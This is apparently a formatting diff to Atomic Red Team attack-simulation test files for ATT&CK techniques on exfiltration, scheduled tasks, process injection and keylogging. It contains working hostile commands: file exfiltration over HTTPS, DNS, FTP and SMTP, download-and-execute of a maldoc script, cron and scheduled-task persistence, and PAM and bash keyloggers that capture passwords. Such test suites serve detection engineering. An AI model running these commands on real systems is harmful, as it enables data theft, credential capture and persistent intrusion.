a/atomics/T1048.002/T1048.002.yaml +++ b/atomics/T1048.002/T1048.002.yaml @@ -1,23 +1,23 @@ attack_technique: T1048.002 display_name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol atomic_tests: -- name: Exfiltrate data HTTPS using curl windows +- name: Exfiltrate data HTTPS using curl windows auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 description: | Exfiltrate data HTTPS using curl to file share site file.io supported_platforms: - - windows + - windows input_arguments: input_file: description: Test file to upload - type: Path + type: path default: PathToAtomicsFolder/T1048.002/src/artifact curl_path: description: path to curl.exe - type: Path + type: path default: C:\Windows\System32\Curl.exe - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | Curl must be installed on system. prereq_command: | @@ -45,12 +45,12 @@ atomic_tests: description: | Exfiltrate data HTTPS using curl to file share site file.io supported_platforms: - - macos - - linux + - macos + - linux input_arguments: input_file: description: Test file to upload - type: Path + type: path default: PathToAtomicsFolder/T1048.002/src/artifact executor: name: bash diff --git a/atomics/T1048.003/T1048.003.yaml b/atomics/T1048.003/T1048.003.yaml index 5bc0d7b7..aea3ba2b 100644 --- a/atomics/T1048.003/T1048.003.yaml +++ b/atomics/T1048.003/T1048.003.yaml @@ -37,11 +37,11 @@ atomic_tests: input_arguments: input_file: description: Path to file to be exfiltrated. - type: Path + type: path default: C:\Windows\System32\notepad.exe ip_address: description: Destination IP address where the data should be sent. - type: String + type: string default: 127.0.0.1 executor: command: | @@ -64,57 +64,57 @@ atomic_tests: xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done 3. Once the data is received, use the below command to recover the data. - + cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r name: manual - name: Exfiltration Over Alternative Protocol - HTTP auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c description: | - Exfiltration of specified file over HTTP. - Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. + Exfiltration of specified file over HTTP. + Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. supported_platforms: - windows executor: command: | - $content = Get-Content #{input_file} - Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content + $content = Get-Content #{input_file} + Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content name: powershell input_arguments: input_file: description: Path to file to exfiltrate - type: Path + type: path default: C:\Windows\System32\notepad.exe ip_address: description: Destination IP address where the data should be sent - type: String + type: string default: http://127.0.0.1 - name: Exfiltration Over Alternative Protocol - SMTP auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9 description: | - Exfiltration of specified file over SMTP. - Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. + Exfiltration of specified file over SMTP. + Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. supported_platforms: - windows executor: command: | - Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} + Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} name: powershell input_arguments: input_file: description: Path to file to exfiltrate - type: Path + type: path default: C:\Windows\System32\notepad.exe sender: description: The email address of the sender - type: String + type: string default: "test@corp.com" receiver: description: The email address of the receiver - type: String + type: string default: "test@corp.com" smtp_server: description: SMTP server to use for email transportation - type: String + type: string default: "127.0.0.1" - name: MAZE FTP Upload auto_generated_guid: 57799bc2-ad1e-4130-a793-fb0c385130ba @@ -127,15 +127,15 @@ atomic_tests: input_arguments: ftp_server: description: FTP Server address - type: String + type: string default: 127.0.0.1 username: description: Username for FTP server login - type: String + type: string default: password: description: Password for FTP server login - type: String + type: string default: executor: command: | @@ -151,13 +151,13 @@ atomic_tests: else {echo "FTP Server Unreachable. Please verify the server address in input args and try again."} cleanup_command: | - $ftp = "ftp://#{ftp_server}/" - try {foreach ($file in (dir "$env:windir\temp" "*.7z")) - {$uri = New-Object System.Uri($ftp+$file.name) - $ftp_del = [System.Net.FtpWebRequest]::create($uri) - $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}') - $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile - $ftp_del.GetResponse()}} catch{} + $ftp = "ftp://#{ftp_server}/" + try {foreach ($file in (dir "$env:windir\temp" "*.7z")) + {$uri = New-Object System.Uri($ftp+$file.name) + $ftp_del = [System.Net.FtpWebRequest]::create($uri) + $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}') + $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile + $ftp_del.GetResponse()}} catch{} name: powershell - name: Exfiltration Over Alternative Protocol - FTP - Rclone auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b @@ -189,10 +189,10 @@ atomic_tests: Check if the exfil package exists prereq_command: | if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1} - get_prereq_command: | + get_prereq_command: | fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760 - description: 'Check if rclone zip exists' - prereq_command: | + prereq_command: | if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip" diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index 59b48d90..a282a43a 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -15,7 +15,7 @@ atomic_tests: input_arguments: domain: description: target SSH domain - type: Url + type: url default: target.example.com executor: command: | @@ -35,15 +35,15 @@ atomic_tests: input_arguments: user_name: description: username for domain - type: String + type: string default: atomic password: description: password for user - type: String + type: string default: atomic domain: description: target SSH domain - type: Url + type: url default: target.example.com executor: command: | @@ -60,28 +60,28 @@ atomic_tests: input_arguments: password: description: Password used to encrypt the data to be exfiltrated - type: String + type: string default: atomic domain: description: The domain name to use for DNS requests - type: String + type: string default: target.example.com ps_module: description: DNSExfiltrator powershell ps_module - type: Path + type: path default: '$env:Temp\dnsexfil.ps1' doh: description: Google or CloudFlare DoH (DNS over HTTP) server - type: String + type: string default: google time: description: The time in milliseconds to wait between each DNS request - type: String + type: string default: 500 encoding: description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers. - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1049/T1049.yaml b/atomics/T1049/T1049.yaml index 1cfe553b..f1b647be 100644 --- a/atomics/T1049/T1049.yaml +++ b/atomics/T1049/T1049.yaml @@ -57,34 +57,34 @@ atomic_tests: sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. supported_platforms: - - windows + - windows input_arguments: SharpView_url: description: sharpview download URL - type: Url + type: url default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true SharpView: description: Path of the executable opensource redteam tool used for the performing this atomic. - type: Path + type: path default: PathToAtomicsFolder\T1049\bin\SharpView.exe syntax: - description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. - type: String - default: | + description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. + type: string + default: | "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare" dependency_executor_name: powershell dependencies: - - description: | - Sharpview.exe must exist on disk at specified location (#{SharpView}) - prereq_command: | - if (Test-Path #{SharpView}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null - Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" + - description: | + Sharpview.exe must exist on disk at specified location (#{SharpView}) + prereq_command: | + if (Test-Path #{SharpView}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null + Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" executor: name: powershell elevation_required: true - command: | + command: | $syntaxList = #{syntax} foreach ($syntax in $syntaxList) { #{SharpView} $syntax -} diff --git a/atomics/T1053.002/T1053.002.yaml b/atomics/T1053.002/T1053.002.yaml index 61bc4385..fbe4b178 100644 --- a/atomics/T1053.002/T1053.002.yaml +++ b/atomics/T1053.002/T1053.002.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1053.002 display_name: 'Scheduled Task/Job: At' @@ -11,7 +10,7 @@ atomic_tests: Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. supported_platforms: - - windows + - windows executor: name: command_prompt elevation_required: false @@ -23,35 +22,35 @@ atomic_tests: This test submits a command to be run in the future by the `at` daemon. supported_platforms: - - linux + - linux input_arguments: time_spec: description: Time specification of when the command should run - type: String + type: string default: now + 1 minute at_command: description: The command to be run - type: String + type: string default: echo Hello from Atomic Red Team dependency_executor_name: sh dependencies: - - description: | - The `at` and `atd` executables must exist in the PATH - prereq_command: | - which at && which atd - get_prereq_command: | - echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)' - - description: | - The `atd` daemon must be running - prereq_command: | - systemctl status atd || service atd status - get_prereq_command: | - echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)' + - description: | + The `at` and `atd` executables must exist in the PATH + prereq_command: | + which at && which atd + get_prereq_command: | + echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)' + - description: | + The `atd` daemon must be running + prereq_command: | + systemctl status atd || service atd status + get_prereq_command: | + echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)' executor: name: sh elevation_required: false - command: | - echo "#{at_command}" | at #{time_spec} \ No newline at end of file + command: |- + echo "#{at_command}" | at #{time_spec} diff --git a/atomics/T1053.003/T1053.003.yaml b/atomics/T1053.003/T1053.003.yaml index 560097b8..4d7bf0ff 100644 --- a/atomics/T1053.003/T1053.003.yaml +++ b/atomics/T1053.003/T1053.003.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1053.003 display_name: 'Scheduled Task/Job: Cron' atomic_tests: @@ -7,16 +6,16 @@ atomic_tests: description: | This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. supported_platforms: - - macos - - linux + - macos + - linux input_arguments: command: description: Command to execute - type: String + type: string default: /tmp/evil.sh tmp_cron: description: Temporary reference file to hold evil cron schedule - type: Path + type: path default: /tmp/persistevil executor: name: bash @@ -30,16 +29,16 @@ atomic_tests: description: | This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. supported_platforms: - - macos - - linux + - macos + - linux input_arguments: command: description: Command to execute - type: String + type: string default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log cron_script_name: description: Name of file to store in cron folder - type: String + type: string default: persistevil executor: elevation_required: true @@ -59,15 +58,15 @@ atomic_tests: description: | This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. supported_platforms: - - linux + - linux input_arguments: command: description: Command to execute - type: String + type: string default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log cron_script_name: description: Name of file to store in /var/spool/cron/crontabs folder - type: String + type: string default: persistevil executor: elevation_required: true diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index 6d38d5e1..25f8d975 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1053.005 display_name: 'Scheduled Task/Job: Scheduled Task' atomic_tests: @@ -23,15 +22,15 @@ atomic_tests: description: | Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. supported_platforms: - - windows + - windows input_arguments: task_command: description: What you want to execute - type: String + type: string default: C:\windows\system32\cmd.exe time: description: What time 24 Hour - type: String + type: string default: "20:10" executor: name: command_prompt @@ -43,31 +42,30 @@ atomic_tests: - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | - Create a task on a remote system. - - Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. + Create a task on a remote system. + Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. supported_platforms: - - windows + - windows input_arguments: task_command: description: What you want to execute - type: String + type: string default: C:\windows\system32\cmd.exe time: description: What time 24 Hour - type: String + type: string default: "20:10" target: description: Target - type: String + type: string default: localhost user_name: description: 'Username to authenticate with, format: DOMAIN\User' - type: String + type: string default: DOMAIN\user password: description: Password to authenticate with - type: String + type: string default: At0micStrong executor: name: command_prompt @@ -83,7 +81,7 @@ atomic_tests: Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. supported_platforms: - - windows + - windows executor: name: powershell elevation_required: false @@ -106,7 +104,7 @@ atomic_tests: input_arguments: ms_product: description: Maldoc application Word - type: String + type: string default: Word dependency_executor_name: powershell dependencies: @@ -127,28 +125,28 @@ atomic_tests: IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" name: powershell - cleanup_command : | + cleanup_command: | Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false - name: WMI Invoke-CimMethod Scheduled Task auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b description: | Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. supported_platforms: - - windows + - windows input_arguments: xml_path: description: path of vbs to use when creating masquerading files - type: Path + type: path default: PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml dependency_executor_name: powershell dependencies: - - description: | - File to copy must exist on disk at specified location (#{xml_path}) - prereq_command: | - if (Test-Path #{xml_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}" + - description: | + File to copy must exist on disk at specified location (#{xml_path}) + prereq_command: | + if (Test-Path #{xml_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}" executor: name: powershell elevation_required: true @@ -163,7 +161,7 @@ atomic_tests: A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The scheduled task will launch powershell to decode and run the command in the registry daily. This is a persistence mechanism recently seen in use by Qakbot. - + [Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/) supported_platforms: - windows @@ -180,27 +178,27 @@ atomic_tests: schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1 reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1 name: command_prompt -- name: Import XML Schedule Task with Hidden Attribute +- name: Import XML Schedule Task with Hidden Attribute auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4 description: | Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2. supported_platforms: - - windows + - windows input_arguments: xml_path: description: path of vbs to use when creating masquerading files - type: Path + type: path default: PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml dependency_executor_name: powershell dependencies: - - description: | - File to copy must exist on disk at specified location (#{xml_path}) - prereq_command: | - if (Test-Path #{xml_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}" + - description: | + File to copy must exist on disk at specified location (#{xml_path}) + prereq_command: | + if (Test-Path #{xml_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}" executor: name: powershell elevation_required: true @@ -217,7 +215,7 @@ atomic_tests: Upon successful execution, powershell.exe will create a scheduled task and modify the action. supported_platforms: - - windows + - windows executor: name: powershell elevation_required: false diff --git a/atomics/T1053.006/T1053.006.yaml b/atomics/T1053.006/T1053.006.yaml index 600d93f4..b0730724 100644 --- a/atomics/T1053.006/T1053.006.yaml +++ b/atomics/T1053.006/T1053.006.yaml @@ -7,23 +7,23 @@ atomic_tests: description: | This test creates Systemd service and timer then starts and enables the Systemd timer supported_platforms: - - linux + - linux input_arguments: path_to_systemd_service: description: Path to systemd service unit file - type: Path + type: path default: /etc/systemd/system/art-timer.service path_to_systemd_timer: description: Path to service timer file - type: Path + type: path default: /etc/systemd/system/art-timer.timer systemd_service_name: description: Name of systemd service - type: String + type: string default: art-timer.service systemd_timer_name: description: Name of systemd service timer - type: String + type: string default: art-timer.timer executor: command: | @@ -58,7 +58,7 @@ atomic_tests: description: | Schedule a user level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command. supported_platforms: - - linux + - linux dependency_executor_name: sh dependencies: - description: | @@ -68,7 +68,7 @@ atomic_tests: get_prereq_command: | echo "Install systemd on the machine."; exit 1; executor: - elevation_required: false + elevation_required: false command: | systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log' cleanup_command: | @@ -82,7 +82,7 @@ atomic_tests: description: | Schedule a system level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command. supported_platforms: - - linux + - linux dependency_executor_name: sh dependencies: - description: | @@ -92,7 +92,7 @@ atomic_tests: get_prereq_command: | echo "Install systemd on the machine."; exit 1; executor: - elevation_required: true + elevation_required: true command: | systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log' cleanup_command: | diff --git a/atomics/T1053.007/T1053.007.yaml b/atomics/T1053.007/T1053.007.yaml index a89c4f57..375882b3 100644 --- a/atomics/T1053.007/T1053.007.yaml +++ b/atomics/T1053.007/T1053.007.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: namespace: description: K8s namespace to list - type: String + type: string default: default dependencies: - description: | @@ -33,7 +33,7 @@ atomic_tests: input_arguments: namespace: description: K8s namespace to list - type: String + type: string default: default dependencies: - description: | diff --git a/atomics/T1055.001/T1055.001.yaml b/atomics/T1055.001/T1055.001.yaml index 8709825d..067f3b70 100644 --- a/atomics/T1055.001/T1055.001.yaml +++ b/atomics/T1055.001/T1055.001.yaml @@ -13,11 +13,11 @@ atomic_tests: input_arguments: process_id: description: PID of input_arguments - type: Integer + type: integer default: (Start-Process notepad -PassThru).id dll_payload: description: DLL to Inject - type: Path + type: path default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll dependency_executor_name: powershell dependencies: diff --git a/atomics/T1055.004/T1055.004.yaml b/atomics/T1055.004/T1055.004.yaml index 25dae388..01d95ed6 100644 --- a/atomics/T1055.004/T1055.004.yaml +++ b/atomics/T1055.004/T1055.004.yaml @@ -18,10 +18,10 @@ atomic_tests: input_arguments: exe_binary: description: Output Binary - type: Path + type: path default: PathToAtomicsFolder\T1055.004\bin\T1055.exe - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{exe_binary} must be exist on system. prereq_command: | @@ -33,4 +33,3 @@ atomic_tests: command: | #{exe_binary} name: command_prompt - diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml index 6d3952d6..adfc231c 100644 --- a/atomics/T1055.012/T1055.012.yaml +++ b/atomics/T1055.012/T1055.012.yaml @@ -11,19 +11,19 @@ atomic_tests: input_arguments: hollow_binary_path: description: Path of the binary to hollow (executable that will run inside the sponsor) - type: String + type: string default: C:\Windows\System32\cmd.exe parent_process_name: description: Name of the parent process - type: String + type: string default: explorer sponsor_binary_path: description: Path of the sponsor binary (executable that will host the binary) - type: String + type: string default: C:\Windows\System32\notepad.exe spawnto_process_name: description: Name of the process to spawn - type: String + type: string default: notepad executor: command: | @@ -42,7 +42,7 @@ atomic_tests: input_arguments: ms_product: description: Maldoc application Word - type: String + type: string default: Word dependency_executor_name: powershell dependencies: diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index 0398c43f..dd5410ec 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: txt_path: description: Path to file containing VBA macro to run - type: Path + type: path default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt dependency_executor_name: powershell dependencies: @@ -55,15 +55,15 @@ atomic_tests: input_arguments: machine: description: machine to target (via psexec) - type: String + type: string default: DC1 mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '%tmp%\mimikatz\x64\mimikatz.exe' psexec_path: description: Path to PsExec - type: String + type: string default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: @@ -97,7 +97,7 @@ atomic_tests: elevation_required: false # locally not, but remotely on target machine then yes - name: Section View Injection auto_generated_guid: c6952f41-6cf0-450a-b352-2ca8dae7c178 - description: | + description: | This test creates a section object in the local process followed by a local section view. The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view. A thread is then created in the target process, using the remote section view as start address. diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index d7da9297..3730aa30 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: filepath: description: Name of the local file, include path. - type: Path + type: path default: $env:TEMP\key.log dependencies: - description: | @@ -36,7 +36,7 @@ atomic_tests: Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). - + Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. dependencies: - description: | @@ -48,13 +48,12 @@ atomic_tests: supported_platforms: - linux executor: - command: - if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; - if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; - sudo touch /tmp/password-auth.bk - sudo touch /tmp/system-auth.bk - sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth - sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth + command: if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth + /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo + cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk + sudo touch /tmp/system-auth.bk sudo echo "session required pam_tty_audit.so + enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session required pam_tty_audit.so + enable=* log_password" >> /etc/pam.d/system-auth cleanup_command: | sudo cp -f /tmp/password-auth.bk /etc/pam.d/password-auth sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth @@ -67,25 +66,25 @@ atomic_tests: To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: | - This test requires to be run in a bash shell and that logger and tee are installed. - prereq_command: | - if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi - if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires to be run in a bash shell and that logger and tee are installed. + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh elevation_required: true - command: | + command: | PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" tail /var/log/syslog - cleanup_command: | + cleanup_command: | unset PROMPT_COMMAND - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 @@ -94,54 +93,54 @@ atomic_tests: To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: | - This test requires to be run in a bash shell - prereq_command: | - if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - get_prereq_command: | - echo "" + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires to be run in a bash shell + prereq_command: | + if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi + get_prereq_command: | + echo "" input_arguments: output_file: name: output_file description: File to store captured commands - type: String + type: string default: /tmp/.keyboard.log executor: name: sh - elevation_required: false - command: | + elevation_required: false + command: | trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG echo "Hello World!" cat #{output_file} - cleanup_command: | + cleanup_command: | rm #{output_file} - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: | Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: | - This test requires sshd and auditd - prereq_command: | - if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi - if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires sshd and auditd + prereq_command: | + if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi + if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" input_arguments: user_account: description: Basic ssh user account for testing. - type: String + type: string default: ubuntu executor: name: sh - elevation_required: true - command: | + elevation_required: true + command: | cp -v /etc/pam.d/sshd /tmp/ echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd systemctl restart sshd @@ -152,30 +151,30 @@ atomic_tests: whoami exit exit - cleanup_command: | + cleanup_command: | cp -fv /tmp/sshd /etc/pam.d/ - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: | The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: | - This test requires sshd and auditd - prereq_command: | - if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - get_prereq_command: | - echo "" + - linux + dependency_executor_name: sh + dependencies: + - description: | + This test requires sshd and auditd + prereq_command: | + if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi + get_prereq_command: | + echo "" executor: name: sh - elevation_required: true - command: | + elevation_required: true + command: | auditctl -a always,exit -F arch=b64 -S execve -k CMDS auditctl -a always,exit -F arch=b32 -S execve -k CMDS whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") - cleanup_command: | + cleanup_command: | systemctl restart auditd - name: MacOS Swift Keylogger auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29 @@ -184,20 +183,20 @@ atomic_tests: Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 supported_platforms: - - macos + - macos input_arguments: swift_src: - description: Location of swift script - type: Path - default: 